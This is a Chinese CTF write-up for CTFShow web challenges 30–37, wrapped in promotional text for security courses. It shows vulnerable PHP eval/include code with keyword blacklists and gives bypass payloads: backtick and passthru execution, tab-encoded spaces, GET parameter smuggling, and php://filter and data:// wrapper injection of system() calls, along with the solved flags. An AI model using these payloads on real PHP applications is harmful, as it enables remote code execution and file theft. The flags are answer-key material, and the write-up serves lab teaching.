CTFShow-WEB入门篇命令执行详细Wp(29-40)_ctfshow-web入门篇详细wp(2)

一、网安学习成长路线图

网安所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。

二、网安视频合集

观看零基础学习视频，看视频学习是最快捷也是最有效果的方式，跟着视频中老师的思路，从基础到深入，还是很容易入门的。

三、精品网安学习书籍

当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。

四、网络安全源码合集+工具包

光学理论是没用的，要学会跟着一起敲，要动手实操，才能将自己的所学运用到实际当中去，这时候可以搞点实战案例来学习。

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

Web30：

error\_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg\_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight\_file(\_\_FILE\_\_);
}

过滤了flag、system、php 其实还可以使用上面的方法换一个命令执行函数即可。

命令执行函数：passthru、shell_exec、exec等 其实这里还可以使用反引号 `

`反引号和shell_exec意思相同在php中称之为执行运算符，PHP 将尝试将反引号中的内容作为 shell 命令来执行，并将其输出信息返回

?c=echo `tac f\*`;
?c=passthru('tac f\*');

ctfshow{c2ef0b5a-047d-4242-8567-daea91a6e06b}

Web31：

error\_reporting(0);
if(isset($\_GET['c'])){
    $c = $\_GET['c'];
    if(!preg\_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight\_file(\_\_FILE\_\_);
}

这里又过滤了cat sort 和空格 可以使用使用空格绕过(%09) 也可也使用&拼接使用eval函数可以使用POST和GET其实一样的

c=eval($_GET[cmd]);&cmd=system("tac f\*");
?c=echo (`tac%09f\*`);

ctfshow{e66df5c7-07fb-4e6e-bcbb-46b209308c9d}

web32：

error\_reporting(0);
if(isset($\_GET['c'])){
    $c = $\_GET['c'];
    if(!preg\_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight\_file(\_\_FILE\_\_);
}

这里又过滤了反斜杠，echo，分号，括号 这里可以使用include函数可以不用括号 实现文件包含 配合伪协议 分号可以使用>? 代替

PS：我们只需要知道 过滤了参数可以使用代替进行绕过就行了这是做题的思路 还是很好理解的

php://filter/read=convert.base64-encode/resource=flag.php #伪协议
?c=include_GET[cmd]>?&cmd=php://filter/read=convert.base64-encode/resource=flag.php

ctfshow{22eca81d-7663-4150-bc72-57825852ad03}

web33：

error\_reporting(0);
if(isset($\_GET['c'])){
    $c = $\_GET['c'];
    if(!preg\_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight\_file(\_\_FILE\_\_);
} 

过滤 了双引号 这里还是和上面那题一样的Payload就可以没啥新的知识点！

?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php

ctfshow{34945d8a-89fa-48b8-919a-883dc71f740c}

web34：

error\_reporting(0);
if(isset($\_GET['c'])){
    $c = $\_GET['c'];
    if(!preg\_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight\_file(\_\_FILE\_\_);
}

这里多了冒号好像，这里也是一样的Payload，但是我们这里用别的伪协议data://进行测试

?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php
?c=include$_GET[cmd]?>&cmd=data://text/plan,<?php system("tac flag.php")?>

ctfshow{1378052e-d82c-446b-9e8d-5c1249ec1001}

web35：

error\_reporting(0);
if(isset($\_GET['c'])){
    $c = $\_GET['c'];
    if(!preg\_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
    
}else{
    highlight\_file(\_\_FILE\_\_);
}

过滤了，=号和<括号这里可以使用data的base64 把要执行的命令加密了传进去<?php system("cat flag.php");?>

?c=include%0a$\_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php
?c=include$\_GET[cmd]?>&cmd=data://text/plan,<?php system("tac flag.php")?>
?c=include$\_GET[cmd]?>&cmd=data://text/plan;base64;PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
#到这里有三种方法可以使用

ctfshow{2529c316-96d3-442b-9642-2135d3cb9904}

web36：

error\_reporting(0);
if(isset($\_GET['c'])){
    $c = $\_GET['c'];
    if(!preg\_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
    
}else{
    highlight\_file(\_\_FILE\_\_);
}

这里过滤了数字0-9 还是可以使用上面的PayLoad只要传参的不是数字就行

?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php
?c=include$_GET[cmd]?>&cmd=data://text/plan,<?php system("tac flag.php")?>

ctfshow{ece6bc01-4a5c-4d30-b638-c8e77800d3f5}

web37：

error\_reporting(0);
if(isset($\_GET['c'])){
    $c = $\_GET['c'];
    if(!preg\_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight\_file(\_\_FILE\_\_);
}

这里过滤了flag 有文件包含了 可以使用伪协议

?c=php://filter/read=convert.base64-encode/resource=flag.php #这里过滤了flag不要使用这一条没用 我只是都想测一遍用下面两个
?c=data://text/palin,<?php system("tac f\*");?>
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZioiKTs/Pg==

ctfshow{472ace50-bae6-472b-b9a3-1c9631a2c34d}

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供：

因篇幅有限，仅展示部分资料

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！